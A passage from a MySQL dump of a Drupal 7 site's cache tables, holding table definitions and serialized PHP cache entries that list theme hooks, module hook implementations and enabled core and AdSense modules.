functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:25:\"template_preprocess_block\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"system_preprocess_block\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:24:\"block_admin_display_form\";a:8:{s:8:\"template\";s:38:\"modules/block/block-admin-display-form\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/block\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:44:\"template_preprocess_block_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:22:\"block__adsense_managed\";a:6:{s:8:\"template\";s:22:\"block--adsense_managed\";s:4:\"path\";s:33:\"sites/all/modules/adsense/managed\";s:14:\"render element\";s:8:\"elements\";s:9:\"base hook\";s:5:\"block\";s:4:\"type\";s:12:\"theme_engine\";s:10:\"theme path\";s:33:\"sites/all/modules/adsense/managed\";}}',0,1444940177,1); /*!40000 ALTER TABLE `cache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_block` -- DROP TABLE IF EXISTS `cache_block`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_block` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the Block module to store already built...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_block` -- LOCK TABLES `cache_block` WRITE; /*!40000 ALTER TABLE `cache_block` DISABLE KEYS */; /*!40000 ALTER TABLE `cache_block` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_bootstrap` -- DROP TABLE IF EXISTS `cache_bootstrap`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_bootstrap` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for data required to bootstrap Drupal, may be...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_bootstrap` -- LOCK TABLES `cache_bootstrap` WRITE; /*!40000 ALTER TABLE `cache_bootstrap` DISABLE KEYS */; INSERT INTO `cache_bootstrap` VALUES ('bootstrap_modules','a:3:{s:5:\"dblog\";O:8:\"stdClass\":2:{s:4:\"name\";s:5:\"dblog\";s:8:\"filename\";s:26:\"modules/dblog/dblog.module\";}s:7:\"overlay\";O:8:\"stdClass\":2:{s:4:\"name\";s:7:\"overlay\";s:8:\"filename\";s:30:\"modules/overlay/overlay.module\";}s:10:\"statistics\";O:8:\"stdClass\":2:{s:4:\"name\";s:10:\"statistics\";s:8:\"filename\";s:36:\"modules/statistics/statistics.module\";}}',0,1451358991,1),('hook_info','a:4:{s:10:\"token_info\";a:1:{s:5:\"group\";s:6:\"tokens\";}s:16:\"token_info_alter\";a:1:{s:5:\"group\";s:6:\"tokens\";}s:6:\"tokens\";a:1:{s:5:\"group\";s:6:\"tokens\";}s:12:\"tokens_alter\";a:1:{s:5:\"group\";s:6:\"tokens\";}}',0,1444940170,1),('lookup_cache','a:10:{s:30:\"cDrupalDefaultEntityController\";s:19:\"includes/entity.inc\";s:12:\"cDrupalQueue\";s:31:\"modules/system/system.queue.inc\";s:19:\"cPagerDefault_mysql\";b:0;s:19:\"iPagerDefault_mysql\";b:0;s:19:\"tPagerDefault_mysql\";b:0;s:16:\"cTableSort_mysql\";b:0;s:16:\"iTableSort_mysql\";b:0;s:16:\"tTableSort_mysql\";b:0;s:20:\"cSelectQueryExtender\";s:28:\"includes/database/select.inc\";s:20:\"cDatabaseTasks_mysql\";s:35:\"includes/database/mysql/install.inc\";}',0,1444940260,1),('module_implements','a:147:{s:15:\"stream_wrappers\";a:1:{s:6:\"system\";b:0;}s:23:\"module_implements_alter\";a:0:{}s:21:\"stream_wrappers_alter\";a:0:{}s:17:\"url_inbound_alter\";a:0:{}s:12:\"custom_theme\";a:1:{s:6:\"system\";b:0;}s:11:\"admin_paths\";a:7:{s:5:\"block\";b:0;s:4:\"node\";b:0;s:7:\"overlay\";b:0;s:8:\"shortcut\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:17:\"admin_paths_alter\";a:0:{}s:4:\"menu\";a:28:{s:5:\"block\";b:0;s:7:\"adsense\";b:0;s:13:\"adsense_click\";b:0;s:11:\"adsense_cse\";b:0;s:15:\"adsense_managed\";b:0;s:15:\"adsense_oldcode\";b:0;s:4:\"blog\";b:0;s:7:\"comment\";b:0;s:7:\"contact\";b:0;s:9:\"dashboard\";b:0;s:5:\"dblog\";b:0;s:8:\"field_ui\";b:0;s:4:\"file\";b:0;s:6:\"filter\";b:0;s:4:\"help\";b:0;s:5:\"image\";b:0;s:4:\"menu\";b:0;s:4:\"node\";b:0;s:7:\"overlay\";b:0;s:4:\"path\";b:0;s:6:\"search\";b:0;s:8:\"shortcut\";b:0;s:10:\"statistics\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:7:\"toolbar\";b:0;s:6:\"update\";b:0;s:4:\"user\";b:0;}s:11:\"entity_info\";a:5:{s:7:\"comment\";b:0;s:4:\"node\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:9:\"node_info\";a:1:{s:4:\"blog\";b:0;}s:11:\"query_alter\";a:0:{}s:24:\"query_translatable_alter\";a:0:{}s:28:\"query_node_type_access_alter\";a:0:{}s:6:\"schema\";a:19:{s:5:\"block\";b:0;s:13:\"adsense_click\";b:0;s:7:\"comment\";b:0;s:7:\"contact\";b:0;s:5:\"dblog\";b:0;s:5:\"field\";b:0;s:17:\"field_sql_storage\";b:0;s:6:\"filter\";b:0;s:5:\"image\";b:0;s:4:\"menu\";b:0;s:4:\"node\";b:0;s:3:\"rdf\";b:0;s:6:\"search\";b:0;s:8:\"shortcut\";b:0;s:10:\"statistics\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:6:\"update\";b:0;s:4:\"user\";b:0;}s:16:\"field_read_field\";a:0:{}s:12:\"schema_alter\";a:0:{}s:17:\"entity_info_alter\";a:1:{s:3:\"rdf\";b:0;}s:11:\"rdf_mapping\";a:5:{s:4:\"blog\";b:0;s:7:\"comment\";b:0;s:4:\"node\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:4:\"help\";a:34:{s:7:\"adsense\";b:0;s:5:\"block\";b:0;s:4:\"blog\";b:0;s:5:\"color\";b:0;s:7:\"comment\";b:0;s:7:\"contact\";b:0;s:10:\"contextual\";b:0;s:9:\"dashboard\";b:0;s:5:\"dblog\";b:0;s:5:\"field\";b:0;s:17:\"field_sql_storage\";b:0;s:8:\"field_ui\";b:0;s:4:\"file\";b:0;s:6:\"filter\";b:0;s:4:\"help\";b:0;s:5:\"image\";b:0;s:4:\"list\";b:0;s:4:\"menu\";b:0;s:4:\"node\";b:0;s:6:\"number\";b:0;s:7:\"options\";b:0;s:7:\"overlay\";b:0;s:4:\"path\";b:0;s:3:\"php\";b:0;s:3:\"rdf\";b:0;s:6:\"search\";b:0;s:8:\"shortcut\";b:0;s:10:\"statistics\";b:0;s:6:\"system\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;s:7:\"toolbar\";b:0;s:6:\"update\";b:0;s:4:\"user\";b:0;}s:11:\"search_info\";a:2:{s:4:\"node\";b:0;s:4:\"user\";b:0;}s:15:\"user_categories\";a:1:{s:4:\"user\";b:0;}s:10:\"menu_alter\";a:1:{s:7:\"comment\";b:0;}s:15:\"menu_link_alter\";a:1:{s:4:\"user\";b:0;}s:16:\"menu_link_insert\";a:0:{}s:16:\"menu_link_update\";a:0:{}s:19:\"menu_get_item_alter\";a:0:{}s:18:\"url_outbound_alter\";a:0:{}s:13:\"library_alter\";a:0:{}s:4:\"init\";a:5:{s:13:\"adsense_click\";b:0;s:5:\"dblog\";b:0;s:7:\"overlay\";b:0;s:6:\"system\";b:0;s:6:\"update\";b:0;}s:17:\"system_info_alter\";a:6:{s:9:\"dashboard\";b:0;s:5:\"field\";b:0;s:7:\"overlay\";b:0;s:6:\"system\";b:0;s:7:\"toolbar\";b:0;s:4:\"user\";b:0;}s:17:\"system_theme_info\";a:0:{}s:17:\"dashboard_regions\";a:1:{s:9:\"dashboard\";b:0;}s:23:\"dashboard_regions_alter\";a:0:{}s:21:\"update_projects_alter\";a:0:{}s:22:\"menu_site_status_alter\";a:1:{s:4:\"user\";b:0;}s:12:\"element_info\";a:6:{s:10:\"contextual\";b:0;s:8:\"field_ui\";b:0;s:4:\"file\";b:0;s:6:\"filter\";b:0;s:6:\"system\";b:0;s:4:\"user\";b:0;}s:18:\"element_info_alter\";a:0:{}s:10:\"form_alter\";a:0:{}s:28:\"form_dblog_filter_form_alter\";a:0:{}s:31:\"form_dblog_clear_log_form_alter\";a:0:{}s:17:\"query_pager_alter\";a:0:{}s:21:\"query_tablesort_alter\";a:0:{}s:20:\"theme_registry_alter\";a:1:{s:15:\"adsense_managed\";b:0;}s:14:\"username_alter\";a:0:{}s:14:\"file_url_alter\";a:0:{}s:28:\"page_delivery_callback_alter\";a:1:{s:7:\"overlay\";b:0;}s:10:\"page_build\";a:3:{s:5:\"block\";b:0;s:9:\"dashboard\";b:0;s:7:\"toolbar\";b:0;}s:22:\"query_block_load_alter\";a:0:{}s:16:\"block_list_alter\";a:4:{s:5:\"block\";b:0;s:9:\"dashboard\";b:0;s:4:\"node\";b:0;s:7:\"overlay\";b:0;}s:11:\"node_grants\";a:0:{}s:16:\"block_view_alter\";a:1:{s:4:\"menu\";b:0;}s:28:\"block_view_system_main_alter\";a:0:{}s:27:\"block_view_user_login_alter\";a:0:{}s:22:\"menu_local_tasks_alter\";a:2:{s:4:\"blog\";b:0;s:4:\"node\";b:0;}s:28:\"block_view_system_help_alter\";a:0:{}s:10:\"page_alter\";a:3:{s:7:\"overlay\";b:0;s:8:\"shortcut\";b:0;s:6:\"system\";b:0;}s:32:\"query_preferred_menu_links_alter\";a:0:{}s:23:\"query_node_access_alter\";a:1:{s:4:\"node\";b:0;}s:26:\"translated_menu_link_alter\";a:1:{s:4:\"user\";b:0;}s:20:\"shortcut_default_set\";a:0:{}s:21:\"menu_breadcrumb_alter\";a:0:{}s:14:\"rdf_namespaces\";a:1:{s:3:\"rdf\";b:0;}s:8:\"js_alter\";a:0:{}s:15:\"html_head_alter\";a:0:{}s:9:\"css_alter\";a:0:{}s:4:\"exit\";a:2:{s:7:\"overlay\";b:0;s:10:\"statistics\";b:0;}s:25:\"overlay_parent_initialize\";a:1:{s:7:\"overlay\";b:0;}s:30:\"query_node_load_multiple_alter\";a:0:{}s:22:\"field_storage_pre_load\";a:0:{}s:19:\"field_read_instance\";a:0:{}s:10:\"field_info\";a:6:{s:4:\"file\";b:0;s:5:\"image\";b:0;s:4:\"list\";b:0;s:6:\"number\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;}s:16:\"field_info_alter\";a:1:{s:4:\"user\";b:0;}s:17:\"field_widget_info\";a:6:{s:4:\"file\";b:0;s:5:\"image\";b:0;s:6:\"number\";b:0;s:7:\"options\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;}s:23:\"field_widget_info_alter\";a:2:{s:4:\"list\";b:0;s:8:\"taxonomy\";b:0;}s:20:\"field_formatter_info\";a:6:{s:4:\"file\";b:0;s:5:\"image\";b:0;s:4:\"list\";b:0;s:6:\"number\";b:0;s:8:\"taxonomy\";b:0;s:4:\"text\";b:0;}s:26:\"field_formatter_info_alter\";a:0:{}s:18:\"field_storage_info\";a:1:{s:17:\"field_sql_storage\";b:0;}s:24:\"field_storage_info_alter\";a:0:{}s:27:\"field_storage_details_alter\";a:0:{}s:11:\"filter_info\";a:3:{s:7:\"adsense\";b:0;s:6:\"filter\";b:0;s:3:\"php\";b:0;}s:17:\"filter_info_alter\";a:0:{}s:17:\"field_attach_load\";a:0:{}s:11:\"entity_load\";a:1:{s:3:\"rdf\";b:0;}s:9:\"node_load\";a:2:{s:7:\"comment\";b:0;s:4:\"user\";b:0;}s:22:\"entity_view_mode_alter\";a:0:{}s:19:\"field_display_alter\";a:0:{}s:24:\"field_display_node_alter\";a:1:{s:4:\"node\";b:0;}s:19:\"entity_prepare_view\";a:0:{}s:12:\"field_access\";a:0:{}s:23:\"field_attach_view_alter\";a:1:{s:3:\"rdf\";b:0;}s:9:\"node_view\";a:4:{s:7:\"adsense\";b:0;s:4:\"blog\";b:0;s:7:\"comment\";b:0;s:10:\"statistics\";b:0;}s:11:\"entity_view\";a:0:{}s:15:\"node_view_alter\";a:0:{}s:17:\"entity_view_alter\";a:0:{}s:24:\"block_view_block_2_alter\";a:0:{}s:5:\"forms\";a:4:{s:7:\"comment\";b:0;s:9:\"dashboard\";b:0;s:4:\"node\";b:0;s:6:\"search\";b:0;}s:21:\"form_search_box_alter\";a:0:{}s:28:\"form_search_block_form_alter\";a:0:{}s:28:\"block_view_search_form_alter\";a:0:{}s:34:\"block_view_system_navigation_alter\";a:0:{}s:24:\"block_view_block_1_alter\";a:0:{}s:27:\"menu_contextual_links_alter\";a:0:{}s:27:\"contextual_links_view_alter\";a:0:{}s:18:\"field_extra_fields\";a:4:{s:7:\"comment\";b:0;s:4:\"node\";b:0;s:8:\"taxonomy\";b:0;s:4:\"user\";b:0;}s:24:\"field_extra_fields_alter\";a:0:{}s:32:\"field_extra_fields_display_alter\";a:0:{}s:29:\"field_attach_preprocess_alter\";a:0:{}s:39:\"query_taxonomy_term_load_multiple_alter\";a:0:{}s:23:\"query_term_access_alter\";a:0:{}s:18:\"taxonomy_term_load\";a:0:{}s:26:\"query_comment_filter_alter\";a:0:{}s:29:\"field_widget_properties_alter\";a:0:{}s:37:\"field_widget_properties_comment_alter\";a:0:{}s:23:\"field_widget_form_alter\";a:0:{}s:37:\"field_widget_text_textarea_form_alter\";a:0:{}s:17:\"field_attach_form\";a:0:{}s:23:\"form_comment_form_alter\";a:0:{}s:36:\"form_comment_node_article_form_alter\";a:0:{}s:24:\"overlay_child_initialize\";a:1:{s:7:\"overlay\";b:0;}s:12:\"requirements\";a:7:{s:7:\"adsense\";b:0;s:5:\"color\";b:0;s:4:\"file\";b:0;s:5:\"image\";b:0;s:4:\"node\";b:0;s:6:\"system\";b:0;s:6:\"update\";b:0;}s:11:\"node_access\";a:1:{s:4:\"node\";b:0;}s:27:\"form_user_login_block_alter\";a:0:{}s:20:\"form_user_pass_alter\";a:0:{}s:30:\"query_user_load_multiple_alter\";a:0:{}s:30:\"query_file_load_multiple_alter\";a:0:{}s:9:\"user_load\";a:0:{}s:19:\"update_status_alter\";a:0:{}s:18:\"taxonomy_term_view\";a:0:{}s:24:\"taxonomy_term_view_alter\";a:0:{}s:21:\"form_user_login_alter\";a:0:{}s:8:\"watchdog\";a:1:{s:5:\"dblog\";b:0;}s:12:\"node_prepare\";a:2:{s:7:\"comment\";b:0;s:4:\"menu\";b:0;}s:34:\"field_widget_properties_node_alter\";a:0:{}s:50:\"field_widget_text_textarea_with_summary_form_alter\";a:0:{}s:45:\"field_widget_taxonomy_autocomplete_form_alter\";a:0:{}s:35:\"field_widget_image_image_form_alter\";a:0:{}s:20:\"form_node_form_alter\";a:3:{s:7:\"comment\";b:0;s:4:\"menu\";b:0;s:4:\"path\";b:0;}s:28:\"form_article_node_form_alter\";a:0:{}s:17:\"filetransfer_info\";a:1:{s:6:\"system\";b:0;}s:23:\"filetransfer_info_alter\";a:0:{}s:37:\"form_update_manager_update_form_alter\";a:0:{}s:28:\"block_view_node_recent_alter\";a:0:{}s:25:\"block_view_user_new_alter\";a:0:{}s:28:\"block_view_blog_recent_alter\";a:0:{}s:31:\"block_view_comment_recent_alter\";a:0:{}s:28:\"block_view_user_online_alter\";a:0:{}s:32:\"form_block_admin_configure_alter\";a:2:{s:9:\"dashboard\";b:0;s:4:\"node\";b:0;}}',0,1447855413,1),('system_list','a:3:{s:14:\"module_enabled\";a:39:{s:5:\"block\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/block/block.module\";s:4:\"name\";s:5:\"block\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7009\";s:6:\"weight\";s:2:\"-5\";s:4:\"info\";a:13:{s:4:\"name\";s:5:\"Block\";s:11:\"description\";s:140:\"Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"block.test\";}s:9:\"configure\";s:21:\"admin/structure/block\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"adsense\";O:8:\"stdClass\":9:{s:8:\"filename\";s:40:\"sites/all/modules/adsense/adsense.module\";s:4:\"name\";s:7:\"adsense\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:12:\"AdSense core\";s:11:\"description\";s:116:\"Displays Google AdSense ads on your site to earn revenue. Requires at least one additional ad unit generator module.\";s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:29:\"admin/config/services/adsense\";s:5:\"files\";a:3:{i:0;s:14:\"adsense.module\";i:1;s:15:\"adsense.install\";i:2;s:17:\"adsense.admin.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:13:\"adsense_click\";O:8:\"stdClass\":9:{s:8:\"filename\";s:68:\"sites/all/modules/adsense/contrib/adsense_click/adsense_click.module\";s:4:\"name\";s:13:\"adsense_click\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:22:\"AdSense Click Tracking\";s:11:\"description\";s:31:\"Tracks clicks to Google Adsense\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:35:\"admin/config/services/adsense/click\";s:5:\"files\";a:4:{i:0;s:20:\"adsense_click.module\";i:1;s:21:\"adsense_click.install\";i:2;s:23:\"adsense_click.admin.inc\";i:3;s:22:\"adsense_click.logs.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:11:\"adsense_cse\";O:8:\"stdClass\":9:{s:8:\"filename\";s:48:\"sites/all/modules/adsense/cse/adsense_cse.module\";s:4:\"name\";s:11:\"adsense_cse\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:10:\"CSE Search\";s:11:\"description\";s:122:\"AdSense for Search generator module. This module uses the new Custom Search Engine code created via the Adsense interface.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:33:\"admin/config/services/adsense/cse\";s:5:\"files\";a:4:{i:0;s:18:\"adsense_cse.module\";i:1;s:19:\"adsense_cse.install\";i:2;s:21:\"adsense_cse.admin.inc\";i:3;s:23:\"adsense_cse.results.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:15:\"adsense_managed\";O:8:\"stdClass\":9:{s:8:\"filename\";s:56:\"sites/all/modules/adsense/managed/adsense_managed.module\";s:4:\"name\";s:15:\"adsense_managed\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:11:\"Managed ads\";s:11:\"description\";s:96:\"Ad unit generator module using the new managed ads feature available in the Google AdSense site.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:37:\"admin/config/services/adsense/managed\";s:5:\"files\";a:3:{i:0;s:22:\"adsense_managed.module\";i:1;s:23:\"adsense_managed.install\";i:2;s:25:\"adsense_managed.admin.inc\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:15:\"adsense_oldcode\";O:8:\"stdClass\":9:{s:8:\"filename\";s:60:\"sites/all/modules/adsense/old/oldcode/adsense_oldcode.module\";s:4:\"name\";s:15:\"adsense_oldcode\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:9:\"Ads (old)\";s:11:\"description\";s:109:\"Ad unit generator module using the old format code in which the colours are specified in the ad\'s JavaScript.\";s:12:\"dependencies\";a:1:{i:0;s:7:\"adsense\";}s:7:\"package\";s:7:\"Adsense\";s:4:\"core\";s:3:\"7.x\";s:9:\"configure\";s:37:\"admin/config/services/adsense/oldcode\";s:5:\"files\";a:3:{i:0;s:25:\"adsense_oldcode.admin.inc\";i:1;s:23:\"adsense_oldcode.install\";i:2;s:22:\"adsense_oldcode.module\";}s:7:\"version\";s:7:\"7.x-1.3\";s:7:\"project\";s:7:\"adsense\";s:9:\"datestamp\";s:10:\"1407429229\";s:5:\"mtime\";i:1434659475;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:4:\"blog\";O:8:\"stdClass\":9:{s:8:\"filename\";s:24:\"modules/blog/blog.module\";s:4:\"name\";s:4:\"blog\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:4:\"Blog\";s:11:\"description\";s:25:\"Enables multi-user blogs.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:9:\"blog.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:5:\"color\";O:8:\"stdClass\":9:{s:8:\"filename\";s:26:\"modules/color/color.module\";s:4:\"name\";s:5:\"color\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7001\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:5:\"Color\";s:11:\"description\";s:70:\"Allows administrators to change the color scheme of compatible themes.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:10:\"color.test\";}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"comment\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/comment/comment.module\";s:4:\"name\";s:7:\"comment\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7009\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:14:{s:4:\"name\";s:7:\"Comment\";s:11:\"description\";s:57:\"Allows users to comment on and discuss published content.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:12:\"dependencies\";a:1:{i:0;s:4:\"text\";}s:5:\"files\";a:2:{i:0;s:14:\"comment.module\";i:1;s:12:\"comment.test\";}s:9:\"configure\";s:21:\"admin/content/comment\";s:11:\"stylesheets\";a:1:{s:3:\"all\";a:1:{s:11:\"comment.css\";s:27:\"modules/comment/comment.css\";}}s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:7:\"contact\";O:8:\"stdClass\":9:{s:8:\"filename\";s:30:\"modules/contact/contact.module\";s:4:\"name\";s:7:\"contact\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:4:\"7003\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:13:{s:4:\"name\";s:7:\"Contact\";s:11:\"description\";s:61:\"Enables the use of both personal and site-wide contact forms.\";s:7:\"package\";s:4:\"Core\";s:7:\"version\";s:4:\"7.41\";s:4:\"core\";s:3:\"7.x\";s:5:\"files\";a:1:{i:0;s:12:\"contact.test\";}s:9:\"configure\";s:23:\"admin/structure/contact\";s:7:\"project\";s:6:\"drupal\";s:9:\"datestamp\";s:10:\"1445457729\";s:5:\"mtime\";i:1445457729;s:12:\"dependencies\";a:0:{}s:3:\"php\";s:5:\"5.2.4\";s:9:\"bootstrap\";i:0;}}s:10:\"contextual\";O:8:\"stdClass\":9:{s:8:\"filename\";s:36:\"modules/contextual/contextual.module\";s:4:\"name\";s:10:\"contextual\";s:4:\"type\";s:6:\"module\";s:5:\"owner\";s:0:\"\";s:6:\"status\";s:1:\"1\";s:9:\"bootstrap\";s:1:\"0\";s:14:\"schema_version\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:4:\"info\";a:12:{s:4:\"name\";s:16:\"Contextual links\";s:11:\"description\";s:75:\"Provides contextual links to perform actions related to elements on a 